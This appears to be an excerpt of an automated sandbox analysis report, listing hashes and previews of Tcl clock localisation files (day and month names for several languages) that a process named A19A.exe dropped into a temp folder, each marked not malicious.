                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1267
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.339253133089184
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:4azu82qJw7W5wO6jwbNU7FtHhoJCLov4v2:46iWrvGtBo6+O2
                                                                                                                                                                                                                                                                                                                                MD5:931A009F7E8A376972DE22AD5670EC88
                                                                                                                                                                                                                                                                                                                                SHA1:44AEF01F568250851099BAA8A536FBBACD3DEBBB
                                                                                                                                                                                                                                                                                                                                SHA-256:CB27007E138315B064576C17931280CFE6E6929EFC3DAFD7171713D204CFC3BF
                                                                                                                                                                                                                                                                                                                                SHA-512:47B230271CD362990C581CD6C06B0BCEA23E10E03D927C7C28415739DB3541D69D1B87DF554E9B4F00ECCAAB0F6AC0565F9EB0DEA8B75C54A90B2D53C928D379
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset sq DAYS_OF_WEEK_ABBREV [list \. "Die"\. "H\u00ebn"\. "Mar"\. "M\u00ebr"\. "Enj"\. "Pre"\. "Sht"]. ::msgcat::mcset sq DAYS_OF_WEEK_FULL [list \. "e diel"\. "e h\u00ebn\u00eb"\. "e mart\u00eb"\. "e m\u00ebrkur\u00eb"\. "e enjte"\. "e premte"\. "e shtun\u00eb"]. ::msgcat::mcset sq MONTHS_ABBREV [list \. "Jan"\. "Shk"\. "Mar"\. "Pri"\. "Maj"\. "Qer"\. "Kor"\. "Gsh"\. "Sht"\. "Tet"\. "N\u00ebn"\. "Dhj"\. ""]. ::msgcat::mcset sq MONTHS_FULL [list \. "janar"\. "shkurt"\. "mars"\. "prill"\. "maj"\. "qershor"\. "korrik"\. "gusht"\. "shtator"\. "tetor"\. "n\u00ebntor"\. "dhjetor"\. ""]. ::msgcat::mcset sq BCE "p.e.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):2035
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.24530896413441
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:46qoQCSdQqQP4QSsIVKP10NupiuQxQaQLlKnM28nGtfR:hjIX15VKP6NmBU3YKnFbp
                                                                                                                                                                                                                                                                                                                                MD5:5CA16D93718AAA813ADE746440CF5CE6
                                                                                                                                                                                                                                                                                                                                SHA1:A142733052B87CA510B8945256399CE9F873794C
                                                                                                                                                                                                                                                                                                                                SHA-256:313E8CDBBC0288AED922B9927A7331D0FAA2E451D4174B1F5B76C5C9FAEC8F9B
                                                                                                                                                                                                                                                                                                                                SHA-512:4D031F9BA75D45EC89B2C74A870CCDA41587650D7F9BC91395F68B70BA3CD7A7105E70C19D139D20096533E06F5787C00EA850E27C4ADCF5A28572480D39B639
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset sr DAYS_OF_WEEK_ABBREV [list \. "\u041d\u0435\u0434"\. "\u041f\u043e\u043d"\. "\u0423\u0442\u043e"\. "\u0421\u0440\u0435"\. "\u0427\u0435\u0442"\. "\u041f\u0435\u0442"\. "\u0421\u0443\u0431"]. ::msgcat::mcset sr DAYS_OF_WEEK_FULL [list \. "\u041d\u0435\u0434\u0435\u0459\u0430"\. "\u041f\u043e\u043d\u0435\u0434\u0435\u0459\u0430\u043a"\. "\u0423\u0442\u043e\u0440\u0430\u043a"\. "\u0421\u0440\u0435\u0434\u0430"\. "\u0427\u0435\u0442\u0432\u0440\u0442\u0430\u043a"\. "\u041f\u0435\u0442\u0430\u043a"\. "\u0421\u0443\u0431\u043e\u0442\u0430"]. ::msgcat::mcset sr MONTHS_ABBREV [list \. "\u0408\u0430\u043d"\. "\u0424\u0435\u0431"\. "\u041c\u0430\u0440"\. "\u0410\u043f\u0440"\. "\u041c\u0430\u0458"\. "\u0408\u0443\u043d"\. "\u0408\u0443\u043b"\.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1167
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.2825791311526515
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:4azu8JLmAQVm/xTsS9CfxTlijQkcjKxFvivn:46hVQc/psJxT8kyhkn
                                                                                                                                                                                                                                                                                                                                MD5:496D9183E2907199056CA236438498E1
                                                                                                                                                                                                                                                                                                                                SHA1:D9C3BB4AEBD9BFD942593694E796A8C2FB9217B8
                                                                                                                                                                                                                                                                                                                                SHA-256:4F32E1518BE3270F4DB80136FAC0031C385DD3CE133FAA534F141CF459C6113A
                                                                                                                                                                                                                                                                                                                                SHA-512:FA7FDEDDC42C36D0A60688CDBFE9A2060FE6B2644458D1EBFC817F1E5D5879EB3E3C78B5E53E9D3F42E2E4D84C93C4A7377170986A437EFF404F310D1D72F135
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset sv DAYS_OF_WEEK_ABBREV [list \. "s\u00f6"\. "m\u00e5"\. "ti"\. "on"\. "to"\. "fr"\. "l\u00f6"]. ::msgcat::mcset sv DAYS_OF_WEEK_FULL [list \. "s\u00f6ndag"\. "m\u00e5ndag"\. "tisdag"\. "onsdag"\. "torsdag"\. "fredag"\. "l\u00f6rdag"]. ::msgcat::mcset sv MONTHS_ABBREV [list \. "jan"\. "feb"\. "mar"\. "apr"\. "maj"\. "jun"\. "jul"\. "aug"\. "sep"\. "okt"\. "nov"\. "dec"\. ""]. ::msgcat::mcset sv MONTHS_FULL [list \. "januari"\. "februari"\. "mars"\. "april"\. "maj"\. "juni"\. "juli"\. "augusti"\. "september"\. "oktober"\. "november"\. "december"\. ""]. ::msgcat::mcset sv BCE "f.Kr.". ::msgcat::mcset sv C
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):991
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.024338627988864
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:12:4EnLzu8r4mc4Go/4mtVfqRvodJ3fjESBToOqe3lHvFgdF6A3ixTZ6OM5mSYoC6Vy:4azu88kGDiq1qhbJ75V9gZSpgmSm9
                                                                                                                                                                                                                                                                                                                                MD5:4DB24BA796D86ADF0441D2E75DE0C07E
                                                                                                                                                                                                                                                                                                                                SHA1:9935B36FF2B1C6DFDE3EC375BC471A0E93D1F7E3
                                                                                                                                                                                                                                                                                                                                SHA-256:6B5AB8AE265DB436B15D32263A8870EC55C7C0C07415B3F9BAAC37F73BC704E5
                                                                                                                                                                                                                                                                                                                                SHA-512:BE7ED0559A73D01537A1E51941ED19F0FEC3F14F9527715CB119E89C97BD31CC6102934B0349D8D0554F5EDD9E3A02978F7DE4919C000A77BD353F7033A4A95B
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset sw DAYS_OF_WEEK_ABBREV [list \. "Jpi"\. "Jtt"\. "Jnn"\. "Jtn"\. "Alh"\. "Iju"\. "Jmo"]. ::msgcat::mcset sw DAYS_OF_WEEK_FULL [list \. "Jumapili"\. "Jumatatu"\. "Jumanne"\. "Jumatano"\. "Alhamisi"\. "Ijumaa"\. "Jumamosi"]. ::msgcat::mcset sw MONTHS_ABBREV [list \. "Jan"\. "Feb"\. "Mar"\. "Apr"\. "Mei"\. "Jun"\. "Jul"\. "Ago"\. "Sep"\. "Okt"\. "Nov"\. "Des"\. ""]. ::msgcat::mcset sw MONTHS_FULL [list \. "Januari"\. "Februari"\. "Machi"\. "Aprili"\. "Mei"\. "Juni"\. "Julai"\. "Agosti"\. "Septemba"\. "Oktoba"\. "Novemba"\. "Desemba"\. ""]. ::msgcat::mcset sw BCE "KK". ::msgcat::mcset sw CE "BK".}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1835
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.018233695396
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:4azu83w0xn8dnzhmmlmYgtg+CKf6CO5ztFSLt8tCtGtv+CKf6CO5ztFSLt8tCtNu:46k0dgmmlmYgtE/t1H
                                                                                                                                                                                                                                                                                                                                MD5:2D9C969318D1740049D28EBBD4F62C1D
                                                                                                                                                                                                                                                                                                                                SHA1:121665081AFC33DDBCF679D7479BF0BC47FEF716
                                                                                                                                                                                                                                                                                                                                SHA-256:30A142A48E57F194ECC3AA9243930F3E6E1B4E8B331A8CDD2705EC9C280DCCBB
                                                                                                                                                                                                                                                                                                                                SHA-512:7C32907C39BFB89F558692535041B2A7FA18A64E072F5CF9AB95273F3AC5A7C480B4F953B13484A07AA4DA822613E27E78CC7B02ACE7A61E58FDB5507D7579C3
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset ta DAYS_OF_WEEK_FULL [list \. "\u0b9e\u0bbe\u0baf\u0bbf\u0bb1\u0bc1"\. "\u0ba4\u0bbf\u0b99\u0bcd\u0b95\u0bb3\u0bcd"\. "\u0b9a\u0bc6\u0bb5\u0bcd\u0bb5\u0bbe\u0baf\u0bcd"\. "\u0baa\u0bc1\u0ba4\u0ba9\u0bcd"\. "\u0bb5\u0bbf\u0baf\u0bbe\u0bb4\u0ba9\u0bcd"\. "\u0bb5\u0bc6\u0bb3\u0bcd\u0bb3\u0bbf"\. "\u0b9a\u0ba9\u0bbf"]. ::msgcat::mcset ta MONTHS_ABBREV [list \. "\u0b9c\u0ba9\u0bb5\u0bb0\u0bbf"\. "\u0baa\u0bc6\u0baa\u0bcd\u0bb0\u0bb5\u0bb0\u0bbf"\. "\u0bae\u0bbe\u0bb0\u0bcd\u0b9a\u0bcd"\. "\u0b8f\u0baa\u0bcd\u0bb0\u0bb2\u0bcd"\. "\u0bae\u0bc7"\. "\u0b9c\u0bc2\u0ba9\u0bcd"\. "\u0b9c\u0bc2\u0bb2\u0bc8"\. "\u0b86\u0b95\u0bb8\u0bcd\u0b9f\u0bcd"\. "\u0b9a\u0bc6\u0baa\u0bcd\u0b9f\u0bae\u0bcd\u0baa\u0bb0\u0bcd"\. "\u0b85\u0b95\u0bcd\u0b9f\u0bcb\u0baa\u0bb0\u0bcd"\. "\u0ba8\u0bb
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):251
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.815592015875268
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:SlSyEtJLlpuoo6dmosDv+9/LosK3v6rZosDo+3v+6f6HK:4EnLzu8eDvWbK3v6r5DF3vmq
                                                                                                                                                                                                                                                                                                                                MD5:293456B39BE945C55536A5DD894787F0
                                                                                                                                                                                                                                                                                                                                SHA1:94DEF0056C7E3082E58266BCE436A61C045EA394
                                                                                                                                                                                                                                                                                                                                SHA-256:AA57D5FB5CC3F59EC6A3F99D7A5184403809AA3A3BC02ED0842507D4218B683D
                                                                                                                                                                                                                                                                                                                                SHA-512:AB763F2932F2FF48AC18C8715F661F7405607E1818B53E0D0F32184ABE67714F03A39A9D0637D0D93CE43606C3E1D702D2A3F8660C288F61DFE852747B652B59
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset ta_IN DATE_FORMAT "%d %M %Y". ::msgcat::mcset ta_IN TIME_FORMAT_12 "%I:%M:%S %P". ::msgcat::mcset ta_IN DATE_TIME_FORMAT "%d %M %Y %I:%M:%S %P %z".}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):2102
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.034298184367717
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:46x9mcib30Rgu1je5YdnULEP8l1je5YdnULEPt:hnIb39ufbufV
                                                                                                                                                                                                                                                                                                                                MD5:0B9B124076C52A503A906059F7446077
                                                                                                                                                                                                                                                                                                                                SHA1:F43A0F6CCBDDBDD5EA140C7FA55E9A82AB910A03
                                                                                                                                                                                                                                                                                                                                SHA-256:42C34D02A6079C4D0D683750B3809F345637BC6D814652C3FB0B344B66B70C79
                                                                                                                                                                                                                                                                                                                                SHA-512:234B9ACA1823D1D6B82583727B4EA68C014D59916B410CB9B158FA1954B6FC3767A261BD0B9F592AF0663906ADF11C2C9A3CC0A325CB1FF58F42A884AF7CB015
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset te DAYS_OF_WEEK_ABBREV [list \. "\u0c06\u0c26\u0c3f"\. "\u0c38\u0c4b\u0c2e"\. "\u0c2e\u0c02\u0c17\u0c33"\. "\u0c2c\u0c41\u0c27"\. "\u0c17\u0c41\u0c30\u0c41"\. "\u0c36\u0c41\u0c15\u0c4d\u0c30"\. "\u0c36\u0c28\u0c3f"]. ::msgcat::mcset te DAYS_OF_WEEK_FULL [list \. "\u0c06\u0c26\u0c3f\u0c35\u0c3e\u0c30\u0c02"\. "\u0c38\u0c4b\u0c2e\u0c35\u0c3e\u0c30\u0c02"\. "\u0c2e\u0c02\u0c17\u0c33\u0c35\u0c3e\u0c30\u0c02"\. "\u0c2c\u0c41\u0c27\u0c35\u0c3e\u0c30\u0c02"\. "\u0c17\u0c41\u0c30\u0c41\u0c35\u0c3e\u0c30\u0c02"\. "\u0c36\u0c41\u0c15\u0c4d\u0c30\u0c35\u0c3e\u0c30\u0c02"\. "\u0c36\u0c28\u0c3f\u0c35\u0c3e\u0c30\u0c02"]. ::msgcat::mcset te MONTHS_ABBREV [list \. "\u0c1c\u0c28\u0c35\u0c30\u0c3f"\. "\u0c2b\u0c3f\u0c2c\u0c4d\u0c30\u0c35\u0c30\u0c3f"\. "\u0c2e\u0c3e\u0c30\u0c4d\u0c1a\u
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):411
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.01781242466238
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:12:4EnLzu8CjZWsn0sEjoD0sLvUFS3v6r5F3vMq:4azu84Z1nnEjoDnLvUFEvS5NvMq
                                                                                                                                                                                                                                                                                                                                MD5:443E34E2E2BC7CB64A8BA52D99D6B4B6
                                                                                                                                                                                                                                                                                                                                SHA1:D323C03747FE68E9B73F7E5C1E10B168A40F2A2F
                                                                                                                                                                                                                                                                                                                                SHA-256:88BDAF4B25B684B0320A2E11D3FE77DDDD25E3B17141BD7ED1D63698C480E4BA
                                                                                                                                                                                                                                                                                                                                SHA-512:5D8B267530EC1480BF3D571AABC2DA7B4101EACD7FB03B49049709E39D665DD7ACB66FD785BA2B5203DDC54C520434219D2D9974A1E9EE74C659FFAEA6B694E0
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset te_IN AM "\u0c2a\u0c42\u0c30\u0c4d\u0c35\u0c3e\u0c39\u0c4d\u0c28". ::msgcat::mcset te_IN PM "\u0c05\u0c2a\u0c30\u0c3e\u0c39\u0c4d\u0c28". ::msgcat::mcset te_IN DATE_FORMAT "%d/%m/%Y". ::msgcat::mcset te_IN TIME_FORMAT_12 "%I:%M:%S %P". ::msgcat::mcset te_IN DATE_TIME_FORMAT "%d/%m/%Y %I:%M:%S %P %z".}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):2305
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.324407451316591
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:46P4QX/wQT0H/u3rPc8JD57XWWND8QM70xJi53Ljtef:hQ556rVDWZcLOO
                                                                                                                                                                                                                                                                                                                                MD5:D145F9DF0E339A2538662BD752F02E16
                                                                                                                                                                                                                                                                                                                                SHA1:AFD97F8E8CC14D306DEDD78F8F395738E38A8569
                                                                                                                                                                                                                                                                                                                                SHA-256:F9641A6EBE3845CE5D36CED473749F5909C90C52E405F074A6DA817EF6F39867
                                                                                                                                                                                                                                                                                                                                SHA-512:E17925057560462F730CF8288856E46FA1F1D2A10B5D4D343257B7687A3855014D5C65B6C85AC55A7C77B8B355DB19F053C74B91DFA7BE7E9F933D9D4DA117F7
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset th DAYS_OF_WEEK_ABBREV [list \. "\u0e2d\u0e32."\. "\u0e08."\. "\u0e2d."\. "\u0e1e."\. "\u0e1e\u0e24."\. "\u0e28."\. "\u0e2a."]. ::msgcat::mcset th DAYS_OF_WEEK_FULL [list \. "\u0e27\u0e31\u0e19\u0e2d\u0e32\u0e17\u0e34\u0e15\u0e22\u0e4c"\. "\u0e27\u0e31\u0e19\u0e08\u0e31\u0e19\u0e17\u0e23\u0e4c"\. "\u0e27\u0e31\u0e19\u0e2d\u0e31\u0e07\u0e04\u0e32\u0e23"\. "\u0e27\u0e31\u0e19\u0e1e\u0e38\u0e18"\. "\u0e27\u0e31\u0e19\u0e1e\u0e24\u0e2b\u0e31\u0e2a\u0e1a\u0e14\u0e35"\. "\u0e27\u0e31\u0e19\u0e28\u0e38\u0e01\u0e23\u0e4c"\. "\u0e27\u0e31\u0e19\u0e40\u0e2a\u0e32\u0e23\u0e4c"]. ::msgcat::mcset th MONTHS_ABBREV [list \. "\u0e21.\u0e04."\. "\u0e01.\u0e1e."\. "\u0e21\u0e35.\u0e04."\. "\u0e40\u0e21.\u0e22."\. "\u0e1e.\u0e04."\. "\u0e21\u0e34.\u0e22."\. "\
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1133
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.32041719596907
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:4azu80VAFVsNTib5vk5CfYTnGk65GmogWFLNvoKvWI3:46j8NTgwVTnlSJWFLJvWI3
                                                                                                                                                                                                                                                                                                                                MD5:3AFAD9AD82A9C8B754E2FE8FC0094BAB
                                                                                                                                                                                                                                                                                                                                SHA1:4EE3E2DF86612DB314F8D3E7214D7BE241AA1A32
                                                                                                                                                                                                                                                                                                                                SHA-256:DF7C4BA67457CB47EEF0F5CA8E028FF466ACDD877A487697DC48ECAC7347AC47
                                                                                                                                                                                                                                                                                                                                SHA-512:79A6738A97B7DB9CA4AE9A3BA1C3E56BE9AC67E71AE12154FD37A37D78892B6414A49E10E007DE2EB314942DC017B87FAB7C64B74EC9B889DAEBFF9B3B78E644
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset tr DAYS_OF_WEEK_ABBREV [list \. "Paz"\. "Pzt"\. "Sal"\. "\u00c7ar"\. "Per"\. "Cum"\. "Cmt"]. ::msgcat::mcset tr DAYS_OF_WEEK_FULL [list \. "Pazar"\. "Pazartesi"\. "Sal\u0131"\. "\u00c7ar\u015famba"\. "Per\u015fembe"\. "Cuma"\. "Cumartesi"]. ::msgcat::mcset tr MONTHS_ABBREV [list \. "Oca"\. "\u015eub"\. "Mar"\. "Nis"\. "May"\. "Haz"\. "Tem"\. "A\u011fu"\. "Eyl"\. "Eki"\. "Kas"\. "Ara"\. ""]. ::msgcat::mcset tr MONTHS_FULL [list \. "Ocak"\. "\u015eubat"\. "Mart"\. "Nisan"\. "May\u0131s"\. "Haziran"\. "Temmuz"\. "A\u011fustos"\. "Eyl\u00fcl"\. "Ekim"\. "Kas\u0131m"\. "Aral\u0131k"\. ""]. ::msgcat::mcset tr D
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):2113
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.227105489438195
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:46+ytFoQAQPHUKPo6eQ4QBuQ0WbQcJeyFQDWZlQD1QbS7XQn1Q7mDaSAJQ7GMLzM:hIpP5tzYhTUhAgEAE+
                                                                                                                                                                                                                                                                                                                                MD5:458A38F894B296C83F85A53A92FF8520
                                                                                                                                                                                                                                                                                                                                SHA1:CE26187875E334C712FDAB73E6B526247C6FE1CF
                                                                                                                                                                                                                                                                                                                                SHA-256:CF2E78EF3322F0121E958098EF5F92DA008344657A73439EAC658CB6BF3D72BD
                                                                                                                                                                                                                                                                                                                                SHA-512:3B8730C331CF29EF9DEDBC9D5A53C50D429931B8DA01EE0C20DAE25B995114966DB9BC576BE0696DEC088DB1D88B50DE2C376275AB5251F49F6544E546BBC531
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset uk DAYS_OF_WEEK_ABBREV [list \. "\u043d\u0434"\. "\u043f\u043d"\. "\u0432\u0442"\. "\u0441\u0440"\. "\u0447\u0442"\. "\u043f\u0442"\. "\u0441\u0431"]. ::msgcat::mcset uk DAYS_OF_WEEK_FULL [list \. "\u043d\u0435\u0434\u0456\u043b\u044f"\. "\u043f\u043e\u043d\u0435\u0434\u0456\u043b\u043e\u043a"\. "\u0432\u0456\u0432\u0442\u043e\u0440\u043e\u043a"\. "\u0441\u0435\u0440\u0435\u0434\u0430"\. "\u0447\u0435\u0442\u0432\u0435\u0440"\. "\u043f'\u044f\u0442\u043d\u0438\u0446\u044f"\. "\u0441\u0443\u0431\u043e\u0442\u0430"]. ::msgcat::mcset uk MONTHS_ABBREV [list \. "\u0441\u0456\u0447"\. "\u043b\u044e\u0442"\. "\u0431\u0435\u0440"\. "\u043a\u0432\u0456\u0442"\. "\u0442\u0440\u0430\u0432"\. "\u0447\u0435\u0440\u0432"\. "\u043b\u0438\u043f"\. "\
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1421
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.382223858419589
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:4azu8pNu9UT5xDHy2W82yGWnf/oxHFBSWWS1D/avSv16:46Oixzy2IyhwZ17cU16
                                                                                                                                                                                                                                                                                                                                MD5:3BD0AB95976D1B80A30547E4B23FD595
                                                                                                                                                                                                                                                                                                                                SHA1:B3E5DC095973E46D8808326B2A1FC45046B5267F
                                                                                                                                                                                                                                                                                                                                SHA-256:9C69094C0BD52D5AE8448431574EAE8EE4BE31EC2E8602366DF6C6BF4BC89A58
                                                                                                                                                                                                                                                                                                                                SHA-512:2A68A7ADC385EDEA02E4558884A24DCC6328CC9F7D459CC03CC9F2D2F58CF6FF2103AD5B45C6D05B7E13F28408C6B05CDDF1DF60E822E5095F86A49052E19E59
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset vi DAYS_OF_WEEK_ABBREV [list \. "Th 2"\. "Th 3"\. "Th 4"\. "Th 5"\. "Th 6"\. "Th 7"\. "CN"]. ::msgcat::mcset vi DAYS_OF_WEEK_FULL [list \. "Th\u01b0\u0301 hai"\. "Th\u01b0\u0301 ba"\. "Th\u01b0\u0301 t\u01b0"\. "Th\u01b0\u0301 n\u0103m"\. "Th\u01b0\u0301 s\u00e1u"\. "Th\u01b0\u0301 ba\u0309y"\. "Chu\u0309 nh\u00e2\u0323t"]. ::msgcat::mcset vi MONTHS_ABBREV [list \. "Thg 1"\. "Thg 2"\. "Thg 3"\. "Thg 4"\. "Thg 5"\. "Thg 6"\. "Thg 7"\. "Thg 8"\. "Thg 9"\. "Thg 10"\. "Thg 11"\. "Thg 12"\. ""]. ::msgcat::mcset vi MONTHS_FULL [list \. "Th\u00e1ng m\u00f4\u0323t"\. "Th\u00e1ng hai"\. "Th\u00e1ng ba"\. "Th\u00e1ng t\u01b0"\. "Th\u00e1ng n\u0103m"\. "Th\u00e1ng s\
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1598)
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):3330
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.469203967086526
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:468jDI/Tw71xDqwPqDa8c3FLbYmhyvMDKbW0YGLuoEyzag29dL:hn7wRdNL
                                                                                                                                                                                                                                                                                                                                MD5:9C33FFDD4C13D2357AB595EC3BA70F04
                                                                                                                                                                                                                                                                                                                                SHA1:A87F20F7A331DEFC33496ECDA50D855C8396E040
                                                                                                                                                                                                                                                                                                                                SHA-256:EF81B41EC69F67A394ECE2B3983B67B3D0C8813624C2BFA1D8A8C15B21608AC9
                                                                                                                                                                                                                                                                                                                                SHA-512:E31EEE90660236BCD958F3C540F56B2583290BAD6086AE78198A0819A92CF2394C62DE3800FDDD466A8068F4CABDFBCA46A648D419B1D0103381BF428D721B13
                                                                                                                                                                                                                                                                                                                                Malicious:false
